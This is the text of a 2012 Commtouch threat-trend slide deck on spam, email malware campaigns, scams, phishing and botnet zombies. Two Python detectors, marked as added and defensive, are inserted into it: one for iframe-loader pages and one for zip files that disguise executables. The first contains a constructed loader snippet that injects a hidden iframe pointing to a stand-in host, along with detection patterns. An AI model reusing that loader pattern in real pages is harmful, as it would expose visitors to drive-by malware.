The Commtouch Quarterly Internet Threats Trend Report provides insight on the latest spam, malware, phishing schemes and other web security threats. The April 2012 edition provides analysis of Internet security threats that occurred during the first quarter of 2012.
6. Key Security Highlights
Spam Zombie daily turnover
270,000 Zombies
Up from 209,000 in Q4, 2011
(Zombie turnover is the number of zombies turned off and on daily)
7. Key Security Highlights
Most popular blog topic on
user generated content sites
Streaming media/
downloads (22%)
Streaming media & downloads
remains in top spot
Includes sites with MP3 files or music related sites such as fan
pages (these might also be categorized as entertainment)
8. Key Security Highlights
Most popular spam topic
Pharmacy Ads
(39% of all spam)
Up 8% over Q4 2011
2nd place Replica spam also increased by over 5%
10. Key Security Highlights
Website category most likely to
be compromised with malware
Pornography/Explicit
• “Parked domains” dropped to 2nd spot
• New entrant “Fashion & Beauty” captured 3rd place
12. Q1 Spam Trends
• Marginal increase in spam during the December 2011 holiday season
• Otherwise, spam remained low vs. Q1 2011 – avg decrease nearly 40%
• Average daily spam levels dropped to 94 billion spam and phishing
emails/day
Figure: Spam levels – Dec 2011 to March 2012 (monthly, December to March)
Source: Commtouch
13. Q1 Spam Trends
• Spam averaged 75% of all emails in Q1
Figure: Spam % of all emails – Dec 2011 to Mar 2012 (monthly, December to March)
Source: Commtouch
14. Q1 Spam Trends
Replica spam affiliate program “GlavTorg” closes
• Spam affiliate programs provide the link between fake
pharmaceuticals and replica manufacturers and spammers
• Dec 2011 - GlavTorg (affiliate focused on replica handbags and
clothing) announced it would stop affiliate payouts at end of
Jan’12
• Commtouch Labs evaluated the effect of the closure with
introduction of the “spam-subject cloud tool”
– Samples thousands of spam messages at definable intervals
– Frequency of spam terms indicated by text size
• Spam subjects used in massive quantities are instantly
distinguishable.
15. Q1 Spam Trends
• Spam topics cloud for the end of January 2012 shows no
evidence of GlavTorg related products
• Spam levels for the period show no obvious increase or decrease
around dates when payments were stopped
• Conclusion:
Spammers have apparently easily
realigned their activities.
Figure: Spam Topics Cloud for End of January 2012
Source: Commtouch
16. Q1 Spam Trends
Spam cloud for entire Q1 2012
Figure: Spam Topics Cloud for Q1 2012
Subjects include:
• Pharmaceuticals (Viagra, Cialis)
• Replicas (Rolex, Breitling)
• Enhancers
• Software (CS5, Windows, Adobe)
• “Dating”
– Present, but due to the great
variance of subject words, are less
prominent
Source: Commtouch
17. Q1 Spam Trends
Spam Topics in Q1
• Pharmacy spam continued to increase, as it did last quarter, to nearly
39% of all spam (~8% more than the previous quarter)
• Replica-themed spam also increased in Q1 by over 5%
Source: Commtouch
18. Q1 Spam Trends
Top Faked (Spoofed) Spam Sending Domains*
• gmail.com is once again the
most spoofed domain
(increasing above 25% for
the first time)
• The top 15 features popular
social networking and mail
sites (AOL, Yahoo, Facebook,
LinkedIn, MySpace) as well
as DHL.com – often used as
part of email malware
attacks
* Domains used by spammers in the “from” field of the spam emails.
Source: Commtouch
19. Q1 Spam Trends
Find out more about Spam Trends in Q1 by
downloading the complete April
Internet Threats Trend Report
http://www.commtouch.com/threat-report-april-2012
21. Q1 Malware Trends
Did cybercriminals target accountants?
• The scale of a February attack was so large that it
certainly must have worked on many CPAs – but
also many other individuals
• Attacks included subjects such as:
– “Fraudulent tax return assistance accusations”
– “Your accountant license can be revoked”
– “Your accountant cpa license termination”
– “Income tax return fraud accusations”
22. Q1 Malware Trends
How it worked
• Clicking on the link downloaded a short HTML page that
promises “Page is loading, please wait. You will see tax info
on this screen.”
• In the background, a small script creates a nested iFrame, which
brought in more JavaScript, creating further dynamic content
• The process repeated until a large portion of malware code was
activated
Figure: Phony accountant tax fraud emails lead to malware
Source: Commtouch
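A static heuristic for spotting loader pages of the kind described on this slide (a near-empty "please wait" page whose script grows the content through iframes), written here as an added example and not taken from the Commtouch report: it parses a captured HTML page, counts the visible words, and checks inline scripts for iframe construction. The sample pages, the word threshold and the script patterns are constructed assumptions.

```python
import re
from html.parser import HTMLParser
from typing import Dict, List

# Script fragments that create or inject an iframe (illustrative set, not from the report).
IFRAME_BUILDER = re.compile(r"createElement\(\s*['\"]iframe['\"]\s*\)|<iframe|\.innerHTML\s*=", re.I)

class PageWalker(HTMLParser):
    """Collect visible text and inline script bodies from an HTML page."""
    def __init__(self) -> None:
        super().__init__()
        self.visible: List[str] = []
        self.scripts: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)      # script body arrives as data
        elif data.strip():
            self.visible.append(data.strip())

def assess_page(html: str) -> Dict[str, object]:
    """Score a page: two or more indicators mark it as a probable loader."""
    walker = PageWalker()
    walker.feed(html)
    words = sum(len(chunk.split()) for chunk in walker.visible)
    indicators = []
    if words < 30:  # threshold is an assumption
        indicators.append("almost no visible content")
    if any("loading" in chunk.lower() for chunk in walker.visible):
        indicators.append("'please wait' stall text")
    if any(IFRAME_BUILDER.search(body) for body in walker.scripts):
        indicators.append("script creates an iframe dynamically")
    return {"words": words, "indicators": indicators, "suspicious": len(indicators) >= 2}

# Constructed samples: a loader shaped like the tax-fraud page, and an ordinary page.
LOADER_HTML = ("<html><body><p>Page is loading, please wait. You will see tax info on this screen.</p>"
               "<script>var f=document.createElement('iframe');f.width=1;f.height=1;"
               "f.src='http://stage2.example.invalid/';document.body.appendChild(f);</script></body></html>")
BENIGN_HTML = ("<html><body><h1>Filing guidance</h1><p>"
               + "Quarterly filing guidance for small business owners and their accountants. " * 6
               + "</p></body></html>")
```

Calling assess_page(LOADER_HTML) returns all three indicators, while the benign page returns none.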
23. Q1 Malware Trends
• 2 weeks later a similarly sized attack targeted accounting
practitioners and the small business market
• The method this time was to describe fictitious purchases of
Intuit accounting software.
• Subject lines included:
– Your QuickBooks software order
– Your Intuit.com order
– Your Intuit.com invoice
– Please confirm your Intuit.com invoice
• The malware downloaded and
deployed in the same way as
described above for the previous attack
Source: Commtouch
24. Q1 Malware Trends
Email-attached malware levels generally low in Q1 2012
• Malware distributors generally stuck to popular malware
topics, such as Fedex delivery notices.
• Several other interesting social engineering techniques were
also used during the quarter:
– Google have received your CV (with an attached CV submission form)
– Your friend invited you to Twitter (with an attached “invitation card”)
– Someone wanting to be your friend on Hi5 (a social network)
– Shipping updates for your Amazon.com order (with attached “shipping
documents”)
25. Q1 Malware Trends
– American Airlines ticket confirmations
– “I love you” (containing only the text “lovely :-)” and phony assurance
that F-Secure Antivirus had found no virus in the attachment
– Sex pictures (with an attached zip referring to www.freeporn4all. Once
extracted, a typical Explorer view shows a file named “document.txt”.
Widening the filename column reveals the true “.exe” extension of the
malware (following multiple space characters) – an old trick but
probably still effective
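A defender-side check for the padded-filename trick described in the last bullet, added here as an example that is not part of the Commtouch report: it opens a zip attachment, inspects each member name, and flags names whose real extension is executable but pushed out of view by a run of spaces or hidden behind a decoy extension. The executable and decoy extension lists and the sample archive are illustrative assumptions.

```python
import io
import re
import zipfile
from typing import Dict, List

# Illustrative lists (an assumption, not from the report): extensions Windows
# executes on double-click, and innocent-looking ones used as decoys.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
DECOY_EXTS = r"txt|pdf|doc|docx|jpg|png"

def inspect_name(name: str) -> List[str]:
    """Return the reasons a zip member name looks deceptive ([] if it looks fine)."""
    base = name.rsplit("/", 1)[-1]  # drop any directory part
    if "." not in base:
        return []
    dot = base.rfind(".")
    stem, true_ext = base[:dot], base[dot:].strip().lower()
    if true_ext not in EXECUTABLE_EXTS:
        return []
    reasons = []
    # The trick from the report: a long run of spaces before ".exe", so a narrow
    # Explorer filename column shows only "document.txt".
    if re.search(r"[ \t\u00a0]{4,}$", stem):
        reasons.append("whitespace padding hides %s" % true_ext)
    # Double-extension variant of the same idea, e.g. "invoice.pdf.exe".
    m = re.search(r"\.(%s)\s*$" % DECOY_EXTS, stem, re.IGNORECASE)
    if m:
        reasons.append("decoy .%s before real %s" % (m.group(1).lower(), true_ext))
    if not reasons:
        reasons.append("executable %s inside archive" % true_ext)
    return reasons

def scan_zip(data: bytes) -> Dict[str, List[str]]:
    """Map every suspicious member name in the archive to its reasons."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            reasons = inspect_name(info.filename)
            if reasons:
                findings[info.filename] = reasons
    return findings

def build_sample_zip() -> bytes:
    """Constructed sample archive mimicking the attachment described above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("document.txt" + " " * 60 + ".exe", b"MZ placeholder, not a real program")
        zf.writestr("invoice.pdf.exe", b"MZ placeholder")
        zf.writestr("readme.txt", b"harmless text")
    return buf.getvalue()
```

scan_zip(build_sample_zip()) reports the padded name and the double-extension name; readme.txt is not flagged.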
26. Q1 Malware Trends
Top 10 Malware of Q1 2012
Rank Malware name
1 W32/InstallCore.A2.gen!Eldorado
2 W32/RLPacked.A.gen!Eldorado
3 W32/Sality.C.gen!Eldorado
4 W32/Heuristic-210!Eldorado
5 W32/RAHack.A.gen!Eldorado
6 W32/Sality.gen2
7 W32/HotBar.L.gen!Eldorado
8 W32/Vobfus.AD.gen!Eldorado
9 JS/Pdfka.CI.gen
10 W32/Korgo.V
Source: Commtouch
29. Q1 Web Security
Facebook “unwatchable video” scam
• Several variants of this scam have appeared on Facebook in the last
few months
• January’s version starts with a friend’s post that looks something
like this:
Source: Commtouch
• The link takes clickers to a Blogspot page which has been very convincingly
designed to look like a Facebook page with an embedded video player.
– None of the buttons on the page are actually clickable
30. Q1 Web Security
• Visitors are informed that
they need the Divx plugin/
YouTube Premium plugin
• Clicking on the download link runs malicious code that:
– Posts a link on the user’s wall to attract more users to
click on the link
– Installs Firefox or Chrome extensions (depending on
browser), used to redirect users to several further scams.
– Redirections happen regardless of the site user actually
intended to go to. One of the redirections is to a scam
offering a $50 Starbucks gift card. After coaxing the
Facebook user to like and share the link they are led to
an affiliate marketing site.
32. Q1 Compromised Websites
Website categories infected with malware
• Pornographic sites climbed back up to the top spot pushing down Parked
domains. As noted in previous reports, the hosting of malware may well
be the intention of the owners of the parked domains and pornography
sites.
• A new entry into the top 3 is “Fashion and Beauty” sites
Rank Category
1 Pornography/Sexually Explicit
2 Parked Domains
3 Fashion and Beauty
4 Portals
5 Entertainment
6 Education
7 Health & Medicine
8 Computers & Technology
9 Business
10 Leisure & Recreation
Source: Commtouch
33. Q1 Compromised Websites
Compromised Websites: An Owner’s Perspective
• Commtouch, in cooperation with StopBadware, undertook a survey of
webmasters whose sites had been compromised
• The report presents statistics & opinions on how site owners navigate the
process of learning their sites have been hacked and repairing the damage
• Some results
– Over 90% of respondents didn't notice any strange activity, despite the fact
that their sites were being abused to send spam, host phishing pages, or
distribute malware.
– Nearly two-thirds of the webmasters surveyed didn't know how the
compromise had happened
– About half of site owners discovered the hack when they attempted to visit
their own site and received a browser or search engine warning
View the complete list of findings by downloading the full report
http://www.commtouch.com/compromised-websites-report-2012
34. Q1 Compromised Websites
Phishing Trends
• Phishing attacks target account
information for many services:
– Banks, email and social network
accounts, and online games.
• Commtouch’s Security Blog has also
featured phishing aimed at Google
Adwords customers.
• In January, a similar phishing attack
was directed at Microsoft adCenter
users. The links in the email led to a
very convincing replica of the
adCenter login page.
35. Q1 Compromised Websites
Website categories infected with phishing
• During the first quarter of 2012, Commtouch analyzed which categories of
legitimate Web sites were most likely to be hiding phishing pages (usually
without the knowledge of the site owner).
• Portals (offering free website hosting) jumped into the highest position.
Sites related to games (the previous leader), dropped off the list.
Rank Category
1 Portals
2 Shopping
3 Fashion & Beauty
4 Education
5 Business
6 Sports
7 Leisure & Recreation
8 Health and medicine
9 Real Estate
10 Personal sites
Source: Commtouch
38. Q1 Zombie Trends
Daily Turnover of Zombies in Q1
• Average turnover: 270,000 newly activated each day sending spam
(increase from 209,000 in Q4 2011)
• Large drop at start of Nov apparently result of Esthost botnet takedown
• Although Esthost primarily used for DNS changing (redirecting Web
requests to malicious sites), some apparently also used to send spam
• Since start of 2012, spammers have worked to source new zombies
Figure: Daily newly activated spam zombies: Oct 2011 to Mar 2012
Source: Commtouch
39. Q1 Zombie Trends
Worldwide Zombie Distribution in Q1
Source: Commtouch
• India again claimed top zombie producer title, but dropped below
20% from nearly 24% in Q4 2011
• Brazil and Russian Federation both climbed back up to the 2nd and
3rd positions, respectively
• Argentina, Poland and Italy joined the top 15, displacing the
United States, Romania and Ukraine
42. Q1 Web 2.0 Trends
Web 2.0 Trends
• “Streaming media and downloads” was the most popular blog or page topic
again in Q2, remaining at 22%.
Rank Category %
1 Streaming Media & Downloads 22%
2 Computers & Technology 8%
3 Entertainment 7%
4 Pornography/Sexually Explicit 5%
5 Restaurants & Dining 5%
6 Fashion & Beauty 5%
7 Arts 5%
8 Religion 5%
9 Sports 4%
10 Education 4%
11 Leisure & Recreation 3%
12 Health & Medicine 3%
13 Games 3%
14 Sex Education 2%
Source: Commtouch
The streaming media & downloads category includes sites with MP3 files or
music related sites such as fan pages.
44. For more information contact:
info@commtouch.com
650 864 2000 (Americas)
+972 9 863 6895 (International)
Web: www.commtouch.com
Blog: http://blog.commtouch.com